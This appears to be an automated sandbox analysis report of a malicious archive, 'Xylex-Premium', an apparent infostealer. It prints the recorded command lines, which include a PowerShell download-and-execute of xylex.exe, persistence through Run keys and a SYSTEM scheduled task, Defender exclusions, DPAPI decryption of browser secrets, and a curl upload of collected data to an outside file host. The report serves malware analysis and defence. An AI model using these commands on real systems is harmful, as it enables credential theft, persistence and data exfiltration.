Analysis Overview
SHA256
bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Threat Level: Known bad
The file Xylex-Premium (1).zip was found to be: Known bad.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Adds Run key to start application
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Detects videocard installed
Uses Task Scheduler COM API
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 06:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 06:24
Reported
2024-06-03 06:27
Platform
win11-20240419-en
Max time kernel
89s
Max time network
94s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Xylex-Premium (1).zip"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 06:24
Reported
2024-06-03 06:26
Platform
win11-20240508-en
Max time kernel
48s
Max time network
67s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cXJSBWljVeMYxpz.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" | C:\Windows\system32\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp" "c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp" "c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
